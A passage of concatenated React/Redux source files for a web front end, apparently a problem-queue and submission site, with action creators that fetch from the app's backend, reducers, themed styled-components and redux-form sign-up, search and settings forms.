'Content-Type' : 'application/json'
}
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response;
throw error;
}
}).then(response => {
return response.json()
}).then(response => {
dispatch(success(response.hierarchy))
}
).catch(error => {
dispatch(failed())
})
}
function request() { return { type: globalConstants.HIERARCHY_LOAD_REQUEST}}
function success(hierarchy) { return { type: globalConstants.HIERARCHY_LOAD_SUCCESS, hierarchy} }
function failed() { return { type: globalConstants.HIERARCHY_LOAD_FAILED } }
}
function queues() {
return dispatch => {
dispatch(request())
fetch(appConfig.backendUrl + "/queue/all", {
method: 'GET',
headers: {
'Content-Type' : 'application/json'
}
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response;
throw error;
}
}).then(response => {
return response.json()
}).then(response => {
dispatch(success(response.queues.map(q => q.name)))
}
).catch(error => {
dispatch(failed())
})
}
function request() { return { type: globalConstants.LIN_QUEUES_LOAD_REQUEST}}
function success(queues) { return { type: globalConstants.LIN_QUEUES_LOAD_SUCCESS, queues} }
function failed() { return { type: globalConstants.LIN_QUEUES_LOAD_FAILED } }
}
function setTheme(theme) {
return {
type: globalConstants.SET_THEME,
theme
}
}
function showLinQueues() {
return {
type: globalConstants.LIN_QUEUES_DISPLAY
}
}
function hideLinQueues() {
return {
type: globalConstants.LIN_QUEUES_HIDE
}
}
function showThemes() {
return {
type: globalConstants.THEMES_DISPLAY
}
}
function hideThemes() {
return {
type: globalConstants.THEMES_HIDE
}
}
export const globalActions = {
hierarchy,
queues,
setTheme,
showLinQueues,
hideLinQueues,
showThemes,
hideThemes
}<file_sep>/src/components/statistics/ScoreboardPage/ScoreboardSearchUserForm.jsx
import React from 'react';
import { Field, reduxForm } from 'redux-form'
import { scoreboardPageActions } from '../../../actions/content/statistics/scoreboardPage'
import renderField from '../../form/RenderField'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(scoreboardPageActions.findUser(props.queue, values.identifier, 50))
}
const validate = values => {
const errors = {}
if (!values.identifier) {
errors.identifier = 'Required'
}
return errors
}
const ScoreboardSearchUserForm = props => {
const { handleSubmit } = props;
return (
<form onSubmit={handleSubmit}>
<div>
<Field name="identifier" component={renderField} type="text" label='Search User' placeholder='Username or email'/>
</div>
<Button type="submit">Search</Button>
</form>
)
}
export default reduxForm({
form: 'form',
validate,
asyncValidate: (values, dispatch, props, blurredField) => {
if (blurredField === 'identifier') {
return scoreboardPageActions.validateUserExists(values.identifier)
}
return new Promise((resolve,reject) => {})
// LEBO PROMISE VYZADUJE CALLBACK, SIGNED: DR. YANDREY
},
asyncBlurFields: ['identifier'],
onSubmit: submit,
getFormState: ({content}) => content.statistics.scoreboard.form
})(ScoreboardSearchUserForm)
<file_sep>/src/actions/content/problemPage.jsx
import { appConfig } from '../../appConfig'
import { problemPageConstants } from '../../constants/content/problemPage'
import { messageType } from '../../constants/misc/backendMessageTypes'
function loadProblemData(problemId) {
const request = () => ({ type: problemPageConstants.LOAD_PROBLEM_DATA_REQUEST })
const success = (problem) => ({type: problemPageConstants.LOAD_PROBLEM_DATA_SUCCESS, problem})
const failure = (message) => ({type: problemPageConstants.LOAD_PROBLEM_DATA_FAILED, message, messageType: messageType.ERROR})
if (!problemId) {
return failure('No Problem specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/problem/" + problemId
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function loadSubmissionPage(problemId, activePage) {
const request = () => ({ type: problemPageConstants.LOAD_SUBMISSION_PAGE_REQUEST, problemId })
const success = (data, hasMore) => ({ type: problemPageConstants.LOAD_SUBMISSION_PAGE_SUCCESS, activePage, data, hasMore })
const failure = (message) => ({type: problemPageConstants.LOAD_SUBMISSION_PAGE_FAILED, message, messageType: messageType.ERROR})
if (!problemId) {
return failure('No Problem specified')
}
return dispatch => {
dispatch(request())
var requestUrl = appConfig.backendUrl + "/problem/" + problemId + "/submissions"
requestUrl += (activePage && activePage > 0) ? "?page=" + activePage : ""
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body.data, body.hasMore))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function loadReplyPage(submissionId, activePage) {
const request = () => ({ type: problemPageConstants.LOAD_REPLY_PAGE_REQUEST })
const success = (submission, activeReplyPage, data, hasMore) => ({ type: problemPageConstants.LOAD_REPLY_PAGE_SUCCESS, submission, activeReplyPage, data, hasMore })
const failure = (message) => ({type: problemPageConstants.LOAD_REPLY_PAGE_FAILED, message, messageType: messageType.ERROR})
if (!submissionId) {
return failure('No submission specified')
}
return dispatch => {
dispatch(request())
var requestUrl = appConfig.backendUrl + "/submission/" + submissionId + "/replies"
requestUrl += (activePage && activePage > 0) ? "?page=" + activePage : ""
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(submissionId, activePage, body.data, body.hasMore))
}).catch(error => {
dispatch(failure(error))
})
}
}
function postSubmission(submission, token) {
const request = () => ({ type: problemPageConstants.POST_SUBMISSION_REQUEST })
const success = (submission) => ({type: problemPageConstants.POST_SUBMISSION_SUCCESS, submission})
const failure = (message) => ({type: problemPageConstants.POST_SUBMISSION_FAILED, message, messageType: messageType.ERROR})
if (!submission) {
return failure('No submission specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/problem/" + submission.problem + "/submit"
fetch(requestUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token },
body: JSON.stringify(submission)
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body))
}).catch(error => {
dispatch(failure(error))
})
}
}
function replySubmission(reply, token) {
const request = () => ({ type: problemPageConstants.REPLY_SUBMISSION_REQUEST })
const success = (submission, reply) => ({ type: problemPageConstants.REPLY_SUBMISSION_SUCCESS, submission, reply })
const failure = (message) => ({type: problemPageConstants.REPLY_SUBMISSION_FAILED, message, messageType: messageType.ERROR})
if (!reply) {
return failure('No reply specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/submission/" + reply.submission + "/reply"
fetch(requestUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token },
body: JSON.stringify(reply)
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body.submission, body))
}).catch(error => {
dispatch(failure(error))
})
}
}
function acceptSubmission(submission, problem, token) {
const request = () => ({ type: problemPageConstants.ACCEPT_SUBMISSION_REQUEST })
const success = () => ({ type: problemPageConstants.ACCEPT_SUBMISSION_SUCCESS, submission })
const failure = (message) => ({type: problemPageConstants.ACCEPT_SUBMISSION_FAILED, message, messageType: messageType.ERROR})
if (!submission) {
return failure('No submission specified')
}
if (!problem) {
return failure('No problem specified')
}
return dispatch => {
dispatch(request())
const requestUrl = appConfig.backendUrl + "/problem/" + problem + "/mark_solved"
fetch(requestUrl, {
method: 'POST',
headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + token },
body: JSON.stringify({
submission
})
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success())
}).catch(error => {
dispatch(failure(error))
})
}
}
function selectReplyForm(submission) {
return {
type: problemPageConstants.SELECT_REPLY_FORM,
reply: submission
}
}
function hideReplies(submission) {
return {
type: problemPageConstants.HIDE_REPLIES,
submission
}
}
function reset() {
return {
type: problemPageConstants.RESET
}
}
export const problemPageActions = {
loadProblemData,
loadSubmissionPage,
loadReplyPage,
postSubmission,
replySubmission,
acceptSubmission,
selectReplyForm,
hideReplies,
reset
}
<file_sep>/src/components/confirm/UsernameChange.jsx
import React from 'react';
import { connect } from 'react-redux'
import { Link } from 'react-router-dom'
import { confirmUsernameChangeActions } from '../../actions/content/confirm/usernameChange'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
const mapStateToProps = state => state.content.confirm.usernameChange
const mapDispatchToProps = dispatch => ({
confirm: (confirmationToken) => dispatch(confirmUsernameChangeActions.confirm(confirmationToken))
})
class ConfirmUsernameChangePage extends React.Component {
componentDidMount() {
this.props.confirm(this.props.token)
}
render() {
return (
<ContentDiv>
<BackendMessage messageType={this.props.messageType}>
{this.props.message && <p>{this.props.message}</p>}
</BackendMessage>
{this.props.verified && (<p> Continue to <Link to='/login'>Login</Link> </p>)}
</ContentDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ConfirmUsernameChangePage)
<file_sep>/src/constants/content/boost.jsx
export const boostConstants = {
REQUEST: 'BOOST_PAGE_BOOST_REQUEST',
SUCCESS: 'BOOST_PAGE_BOOST_SUCCESS',
FAILED: 'BOOST_PAGE_BOOST_FAILED',
RESET: 'BOOST_PAGE_RESET'
}
export const boostStages = {
BOOSTING: 0,
COMPLETED: 1
}
<file_sep>/src/reducers/content/profile/profilePage.jsx
import { profilePageConstants } from '../../../constants/content/profile/profilePage'
const defaultState = {
data: {
firstName: "",
lastName: "",
email: "",
problem_count: 0,
submission_count: 0,
reply_count: 0,
balances: {}
}
}
function profilePageReducer(state=defaultState, action) {
switch(action.type) {
case profilePageConstants.LOAD_USER_REQUEST:
return {...state, message: "Loading data", messageType: action.messageType}
case profilePageConstants.LOAD_USER_SUCCESS:
return {data: action.user || defaultState.data}
case profilePageConstants.LOAD_USER_FAILED:
return {...state, message: "No user found", messageType: action.messageType}
default:
return state
}
}
export default profilePageReducer
<file_sep>/src/components/form/RenderTextArea.jsx
import React from 'react'
import TextAreaDiv from '../../styled-components/form/TextAreaDiv'
const renderTextArea = ({
input,
label,
type,
placeholder,
rows,
cols,
center,
meta: {touched, error}
}) => (
<TextAreaDiv center={center}>
<textarea {...input} placeholder={placeholder || label} rows={rows} cols={cols}/>
{touched && error && <span>{error}</span>}
</TextAreaDiv>
)
export default renderTextArea
<file_sep>/src/styled-components/sidebars/QueueDropdown.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedQueueDropdown = styled.div`
margin: 0px 10px 0px 10px;
font-family: Helvetica, Arial, Sans-Serif;
background-color: #110042;
padding:6px;
border-radius:5px;
font-weight:bold;
color:white;
:hover {
text-decoration: underline;
cursor: pointer;
}
`
const TryhardQueueDropdown = props => <div {...props} />
const QueueDropdown = props => <ThemeSelector
buzzfeed={<BuzzfeedQueueDropdown {...props} />}
tryhard={<TryhardQueueDropdown {...props} />}
/>
export default QueueDropdown<file_sep>/src/reducers/content/profile/personalInformationPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { personalInformationPageStages, personalInformationPageConstants } from '../../../constants/content/profile/personalInformationPage'
// Initial stage: the user is filling in one of the settings forms.
const defaultState = {
	stage: personalInformationPageStages.SUBMITTING_FORM
}
// After a sensitive form is submitted, the user must re-enter their
// current password before the change is sent to the backend.
const defaultPwdConfirmationState = {
	stage: personalInformationPageStages.PASSWORD_CONFIRMATION,
	message:'Please confirm by entering your current password'
}
// Terminal stage, reached once the change request has been issued.
const defaultCompletionState = {
	stage: personalInformationPageStages.COMPLETED,
	message: "Waiting for server confirmation"
}
/**
 * State machine for the personal-information settings page.
 * Stages: SUBMITTING_FORM -> PASSWORD_CONFIRMATION -> COMPLETED.
 * `form` identifies which of the four sub-forms (email/username/password/
 * names) is being changed; `values` carries its submitted values across
 * the password-confirmation step.
 */
function personalInformationPageReducer(state=defaultState, action) {
	switch (action.type) {
		case personalInformationPageConstants.REQUEST_FORM_FILLED:
			// Only the four known forms may proceed to password confirmation.
			return (['email','username','password','names'].includes(action.form)) ? {
				...defaultPwdConfirmationState,
				form: action.form,
				values: action.values
			} : {
				stage: personalInformationPageStages.SUBMITTING_FORM,
				message: 'lol rly unexpected error xD'
			}
		case personalInformationPageConstants.CONFIRM_PASSWORD_REQUEST:
			// Keep the pending form + values while the password is verified.
			return {
				stage: personalInformationPageStages.PASSWORD_CONFIRMATION,
				message: "Waiting for server response",
				form: state.form,
				values: state.values
			}
		case personalInformationPageConstants.CONFIRM_PASSWORD_FAILED:
			// Wrong password: bounce back to the form stage (values dropped).
			return {
				stage: personalInformationPageStages.SUBMITTING_FORM,
				message: "Password confirmation failed"
			}
		// CHANGE_*_REQUEST: advance to the completion stage while waiting
		// for the backend to acknowledge the corresponding change.
		case personalInformationPageConstants.CHANGE_EMAIL_REQUEST:
			return {
				...defaultCompletionState,
				form: 'email',
				values: state.values
			}
		case personalInformationPageConstants.CHANGE_USERNAME_REQUEST:
			return {
				...defaultCompletionState,
				form: 'username',
				values: state.values
			}
		case personalInformationPageConstants.CHANGE_PASSWORD_REQUEST:
			return {
				...defaultCompletionState,
				form: 'password',
				values: state.values
			}
		case personalInformationPageConstants.CHANGE_NAMES_REQUEST:
			return {
				...defaultCompletionState,
				form: 'names',
				values: state.values
			}
		// CHANGE_*_SUCCESS: same stage, user-facing confirmation message.
		case personalInformationPageConstants.CHANGE_EMAIL_SUCCESS:
			return {
				...defaultCompletionState,
				message: 'Changes submitted, check your NEW email box',
				form: 'email',
				values: state.values
			}
		case personalInformationPageConstants.CHANGE_USERNAME_SUCCESS:
			return {
				...defaultCompletionState,
				message: 'Changes submitted, check your email box',
				form: 'username',
				values: state.values
			}
		case personalInformationPageConstants.CHANGE_PASSWORD_SUCCESS:
			return {
				...defaultCompletionState,
				message: 'Changes submitted, check your email box',
				form: 'password',
				values: state.values
			}
		case personalInformationPageConstants.CHANGE_NAMES_SUCCESS:
			return {
				...defaultCompletionState,
				message: 'Name of the user changed',
				form: 'names',
				values: state.values
			}
		// Any change failure returns to the form stage with the backend's
		// error message (deliberate fallthrough across the four forms).
		case personalInformationPageConstants.CHANGE_EMAIL_FAILED:
		case personalInformationPageConstants.CHANGE_USERNAME_FAILED:
		case personalInformationPageConstants.CHANGE_PASSWORD_FAILED:
		case personalInformationPageConstants.CHANGE_NAMES_FAILED:
			return {
				stage: personalInformationPageStages.SUBMITTING_FORM,
				message: action.message
			}
		case personalInformationPageConstants.RESET:
			return defaultState
		default:
			return state
	}
}
const personalInformationFormReducer = reducer
export default combineReducers({
page: personalInformationPageReducer,
form: personalInformationFormReducer
})<file_sep>/src/components/problem/ProblemPage/PostSubmissionForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import { problemPageActions } from '../../../actions/content/problemPage'
import MyEditor from '../../form/MyEditor'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(problemPageActions.postSubmission({content: values.content, problem: props.problem}, props.token))
}
let PostSubmissionForm = props => {
const { handleSubmit } = props;
return (
<form onSubmit={handleSubmit}>
<div>
<h4>Post your submission here!</h4>
<Field name="content" component={MyEditor} />
</div>
<Button type="submit">Submit</Button>
</form>
)
}
PostSubmissionForm = reduxForm({
form: 'submission',
onSubmit: submit,
getFormState: ({content}) => content.problemPage.form
})(PostSubmissionForm)
export default PostSubmissionForm
<file_sep>/src/styled-components/problem/SolutionLabel.jsx
// IMPORTANT HAVE TO REFACTOR NAMES, CUZ THIS WILL BE CONFUSED WITH PROBELM BOX ON QUEUE PAGE
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedSolutionLabel = styled.div`
color: green;
margin-right: 10px;
margin-left: 0px;
`
const TryhardSolutionLabel = props => <div {...props}/>
const SolutionLabel = props => <ThemeSelector
buzzfeed={<BuzzfeedSolutionLabel {...props} />}
tryhard={<TryhardSolutionLabel {...props} />}
/>
export default SolutionLabel<file_sep>/src/actions/content/profile/activityPage.jsx
import { appConfig } from '../../../appConfig'
import { activityPageConstants } from '../../../constants/content/profile/activityPage';
import { messageType } from '../../../constants/misc/backendMessageTypes'
/**
 * Thunk: load one page of a user's activity (posts).
 * Dispatches REQUEST immediately, then SUCCESS with the page data and a
 * hasMore flag, or FAILED with a human-readable message.
 * @param {string} user - username whose activity is fetched
 * @param {number} pageIndex - zero-based page; pages > 0 become ?page=N
 */
function setActivePage(user, pageIndex) {
	const request = (activePage) => ({ type: activityPageConstants.SET_ACTIVE_PAGE_REQUEST, activePage })
	const success = (activePage, data, hasMore) => ({ type: activityPageConstants.SET_ACTIVE_PAGE_SUCCESS, activePage, data, hasMore })
	const failure = (message) => ({ type: activityPageConstants.SET_ACTIVE_PAGE_FAILED, message, messageType: messageType.ERROR })
	if (!user) {
		return dispatch => {
			dispatch(failure('No user specified'))
		}
	}
	return dispatch => {
		dispatch(request(pageIndex));
		// Encode the username so special characters cannot break the path.
		var requestUrl = appConfig.backendUrl + "/u/" + encodeURIComponent(user) + "/posts"
		requestUrl += (pageIndex && pageIndex > 0) ? "?page=" + pageIndex : ""
		fetch(requestUrl, {
			method: 'GET',
			headers: { 'Content-Type': 'application/json' }
		}).then(response => {
			// NOTE: perhaps parse 304 statuses, so more efficient
			if (response.status >= 200 && response.status < 400) {
				return response
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).then(response => response.json())
		.then(body => {
			dispatch(success(pageIndex, body.data, body.hasMore))
		}).catch(error => {
			// BUG FIX: previously dispatched the Error object itself as the
			// message; every other consumer expects a string.
			dispatch(failure(error.message))
		})
	}
}
// Select which user's activity is being browsed.
const setUser = (user) => ({ type: activityPageConstants.SET_USER, user })

// Restore the activity page to its initial state.
const reset = () => ({ type: activityPageConstants.RESET })

export const activityPageActions = {
	setActivePage,
	setUser,
	reset
}
<file_sep>/src/styled-components/problem-related/ProblemBox.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants'
const BuzzfeedProblemBox = styled.div`
display: flex;
flex-direction: column;
justify-content: space-between;
width: 250px;
@media(max-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
width: 90%;
}
height: 100px;
margin: 20px;
border-radius: 10px;
padding: 10px;
background-color: rgba(67, 0, 50, 0.7);
a {
color: #150050;
}
`
const TryhardProblemBox = props => <div {...props}/>
const ProblemBox = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBox {...props} />}
tryhard={<TryhardProblemBox {...props} />}
/>
export default ProblemBox<file_sep>/src/styled-components/header/HeaderEntries.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { headerStyleConstants } from './Constants'
const BuzzfeedHeader = styled.ul`
list-style-type: none;
display: flex;
flex-wrap: wrap;
justify-content: flex-start;
float: left;
@media(max-width: ${headerStyleConstants.HEADER_COLLAPSE_LOGGED_IN_CAPTION}) {
justify-content: space-around;
}
`
const TryhardHeader = props => <ul {...props}/>
const Header = props => <ThemeSelector
buzzfeed={<BuzzfeedHeader {...props} />}
tryhard={<TryhardHeader {...props} />}
/>
export default Header<file_sep>/src/styled-components/defaults/ButtonsCenteredDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ButtonDiv from './ButtonDiv'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonBlock = styled(ButtonDiv)`
justify-content: center;
`
const TryhardRepliesButtonBlock = props => <button {...props} />
const RepliesButtonBlock = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonBlock {...props} />}
tryhard={<TryhardRepliesButtonBlock {...props} />}
/>
export default RepliesButtonBlock;
<file_sep>/src/components/signup/SignUpForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../form/RenderField'
import { signupActions } from '../../actions/content/signup'
import FormButton from '../../styled-components/form/FormButton'
// redux-form submit handler: forward the form values to the signup thunk.
const submit = (values, dispatch) => dispatch(signupActions.signup(values))
/**
 * Synchronous validation for the sign-up form.
 * @param {Object} values - current form values
 * @returns {Object} map of field name -> error string (empty when valid)
 */
const validate = values => {
	const errors = {}
	if (!values.username) {
		errors.username = 'Required'
	}
	if (!values.password) {
		// BUG FIX: restored from a scrubbed '<PASSWORD>' placeholder.
		errors.password = 'Required'
	}
	if (!values.email) {
		errors.email = 'Required'
	}
	if (!values.confirmPassword) {
		// BUG FIX: restored from a scrubbed '<PASSWORD>' placeholder.
		errors.confirmPassword = 'Required'
	}
	if (values.confirmPassword !== values.password) {
		errors.confirmPassword = 'Passwords don\'t match'
	}
	return errors
}
// Fields re-checked against the backend on blur (async validation).
const asyncBlurFields = ['username', 'password', 'email']
const SignUpForm = props => {
const { handleSubmit } = props;
return (
<form onSubmit={handleSubmit}>
<Field name="username" component={renderField} type="text" label="Username" alignLeft/>
<Field name="password" component={renderField} type="password" label="Password" placeholder="at least 8 characters" alignLeft/>
<Field name="confirmPassword" component={renderField} type="password" label="Confirm password" alignLeft/>
<Field name="email" component={renderField} type="text" label="Email" alignLeft/>
<Field name="firstName" component={renderField} type="text" label="First Name" alignLeft/>
<Field name="lastName" component={renderField} type="text" label="Last Name" alignLeft/>
<FormButton type="submit" alignLeft>Submit</FormButton>
</form>
)
}
// Wire the form to redux-form; the form state is kept under
// content.signup.form rather than the default top-level `form` slice.
export default reduxForm({
	form: 'form',
	validate,
	asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
	asyncBlurFields,
	onSubmit: submit,
	getFormState: ({content}) => content.signup.form
})(SignUpForm)
<file_sep>/src/reducers/global.jsx
/*
IMPORTANT HOW TO WRAP SHARED STUFF INTO ALL COMPONENTS (SO THAT SHARED STUFF IS UPDATED ANYWHERE)
*/
import { globalConstants, themes, defaultTheme } from "../constants/global"
// Fallback hierarchy / queue list shown before (or if) the backend loads.
const defaultHierarchy = {Index:{} }
const defaultLinQueues = ['Index']
const defaultState = {hierarchy: defaultHierarchy, linQueues: defaultLinQueues, theme:defaultTheme, linQueuesDisplayed: false, themesDisplayed: false, themes: themes}
/**
 * Global app state: queue hierarchy, flat queue list, active theme and
 * the open/closed flags of the two header dropdowns.
 */
export function globalReducer(state = defaultState, action) {
	switch (action.type) {
		// Hierarchy loading: reset to defaults while in flight; keep the
		// previous value on failure.
		case globalConstants.HIERARCHY_LOAD_REQUEST:
			return { ...state, hierarchy: defaultHierarchy }
		case globalConstants.HIERARCHY_LOAD_SUCCESS:
			return { ...state, hierarchy: action.hierarchy || defaultHierarchy }
		case globalConstants.HIERARCHY_LOAD_FAILED:
			return { ...state, hierarchy: state.hierarchy || defaultHierarchy }
		// Flat ("linear") queue list follows the same pattern.
		case globalConstants.LIN_QUEUES_LOAD_REQUEST:
			return { ...state, linQueues: defaultLinQueues }
		case globalConstants.LIN_QUEUES_LOAD_SUCCESS:
			return { ...state, linQueues: action.queues }
		case globalConstants.LIN_QUEUES_LOAD_FAILED:
			return { ...state, linQueues: state.linQueues || defaultLinQueues }
		// Dropdown visibility toggles.
		case globalConstants.LIN_QUEUES_DISPLAY:
			return { ...state, linQueuesDisplayed: true }
		case globalConstants.LIN_QUEUES_HIDE:
			return { ...state, linQueuesDisplayed: false }
		case globalConstants.THEMES_DISPLAY:
			return { ...state, themesDisplayed: true }
		case globalConstants.THEMES_HIDE:
			return { ...state, themesDisplayed: false }
		case globalConstants.SET_THEME:
			// Ignore unknown theme names to keep the UI renderable.
			if (!Object.keys(themes).includes(action.theme)) {
				return state;
			}
			return { ...state, theme: action.theme}
		default:
			return state
	}
}<file_sep>/src/styled-components/problem-related/ProblemBoxMeta.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedProblemBoxMeta = styled.ul`
display: flex;
justify-content: space-between;
font-size: 11px;
list-style-type: none;
padding: 0px;
`
const TryhardProblemBoxMeta = props => <ul {...props}/>
const ProblemBoxMeta = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemBoxMeta {...props} />}
tryhard={<TryhardProblemBoxMeta {...props} />}
/>
export default ProblemBoxMeta<file_sep>/src/components/home/Homepage.jsx
import React from 'react';
import QueueSidebar from '../queue/QueueSidebar'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import PageDiv from '../../styled-components/defaults/PageDiv'
export default class Homepage extends React.Component {
render() {
return (
<PageDiv>
<QueueSidebar />
<ContentDiv sidebar>
<h2>
Welcome {(this.props.user && this.props.user.username) ? this.props.user.username : 'guest'}
</h2>
No clue what should be added to the homepage
</ContentDiv>
</PageDiv>
);
}
}
<file_sep>/src/components/issues/InternetExplorer.jsx
import React from "react";
import { Link } from "react-router-dom"
const IEPage = props => (
<div>
This page is for Zoomers only, no Boomers allowed<br/>
GO AND DOWNLOAD A REAL <Link to='https://www.torproject.org/download/'>BROWSER</Link>
</div>
)
export default IEPage<file_sep>/src/reducers/content/statistics.jsx
import { combineReducers } from 'redux'
import economyPageReducer from './statistics/economyPage'
import scoreboardPageReducer from './statistics/scoreboardPage'
export default combineReducers({
economyPage: economyPageReducer,
scoreboard: scoreboardPageReducer
})<file_sep>/src/styled-components/statistics/ScoreboardPageBar.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedScoreboardPageBar = styled.table`
text-align: center;
margin: auto;
border-spacing: 10px;
tbody td {
background: transparent;
border-radius: 3px;
background-color: rgba(67, 0, 50, 0.35);
color: #962020;
margin: 2px 1em;
padding: 0.25em 1em;
font-weight: bold;
a {
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
}
`
const TryhardScoreboardPageBar = props => <table {...props}/>
const ScoreboardPageBar = props => <ThemeSelector
buzzfeed={<BuzzfeedScoreboardPageBar {...props} />}
tryhard={<TryhardScoreboardPageBar {...props} />}
/>
export default ScoreboardPageBar<file_sep>/src/actions/content/confirm/emailChange.jsx
import { appConfig } from '../../../appConfig'
import { confirmEmailChangeConstants } from '../../../constants/content/confirm/emailChange'
import { messageType } from '../../../constants/misc/backendMessageTypes'
/**
 * Thunk: confirm an email change with the token from the emailed link.
 * Dispatches REQUEST, then SUCCESS on a 2xx/3xx response, otherwise
 * FAILED with a readable error message.
 * @param {string} confirmationToken - token embedded in the email link
 */
function confirm(confirmationToken) {
	const request = () => ({type: confirmEmailChangeConstants.REQUEST})
	const success = () => ({type: confirmEmailChangeConstants.SUCCESS})
	const failure = (message) => ({type: confirmEmailChangeConstants.FAILED, message, messageType: messageType.ERROR})
	return dispatch => {
		dispatch(request())
		fetch(appConfig.backendUrl + "/verify/newEmail", {
			method: 'POST',
			headers: { 'Content-Type': 'application/json' },
			body: JSON.stringify({emailToken: confirmationToken})
		}).then(response => {
			if (response.status >= 200 && response.status < 400) {
				dispatch(success())
			} else {
				var error = new Error(response.statusText)
				error.response = response
				throw error
			}
		}).catch(error => {
			// BUG FIX: JSON.stringify(Error) yields "{}" because Error
			// properties are non-enumerable; dispatch the message text.
			dispatch(failure(error.message))
		})
	}
}
export const confirmEmailChangeActions = {
	confirm
}
<file_sep>/src/components/form/RenderField.jsx
import React from 'react'
import InputDiv from '../../styled-components/form/InputDiv'
import ValidationMessage from '../../styled-components/form/ValidationMessage'
const renderField = ({
input,
label,
type,
placeholder,
alignLeft,
meta: {asyncValidating, touched, error}
}) => (
<InputDiv alignLeft={alignLeft}>
{label && <label>{label}</label>}
<div>
<input {...input} type={type} placeholder={placeholder || label} />
{touched && error && <ValidationMessage>{error}</ValidationMessage>}
</div>
</InputDiv>
)
export default renderField<file_sep>/src/components/header/ThemeDropdown.jsx
import React from 'react';
import { connect } from 'react-redux'
import StyledThemeDropdown from '../../styled-components/header/ThemeDropdown'
import ThemeDropdownEntries from '../../styled-components/header/ThemeDropdownEntries'
import { globalActions } from '../../actions/global'
const mapStateToProps = state => ({
displayed: state.global.themesDisplayed,
currentTheme: state.global.theme,
themes: state.global.themes || {}
})
const mapDispatchToProps = dispatch => {
return {
show: () => dispatch(globalActions.showThemes()),
hide: () => dispatch(globalActions.hideThemes()),
setTheme: (theme) => dispatch(globalActions.setTheme(theme))
}
}
class ThemeDrowdown extends React.Component {
componentWillUnmount() {
if (this.props.displayed) {
this.props.hide()
}
}
render() {
const themeDivs = (
<ThemeDropdownEntries>
{Object.keys(this.props.themes).map((theme, index) => (
<li key={index}>
<div onClick={() => this.props.setTheme(theme)}>{this.props.themes[theme].label}</div>
</li>
))}
</ThemeDropdownEntries>
)
const currentTheme = this.props.themes[this.props.currentTheme];
return (
<div>
<StyledThemeDropdown className="button" onClick={this.props.displayed ? this.props.hide : this.props.show}>{currentTheme.textWhenSelected || currentTheme.label}</StyledThemeDropdown>
{ this.props.displayed && themeDivs}
</div>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(ThemeDrowdown)<file_sep>/src/components/profile/TransactionPage/TransactionBox.jsx
import React from 'react';
import { Link } from 'react-router-dom'
import StyledTransactionBox from '../../../styled-components/profile/TransactionBox'
import TransactionBoxMeta from '../../../styled-components/profile/TransactionBoxMeta'
import TransactionBoxMetaSection from '../../../styled-components/profile/TransactionBoxMetaSection'
const TransactionBox = (props) => (
<StyledTransactionBox>
<TransactionBoxMeta>
<TransactionBoxMetaSection grow>
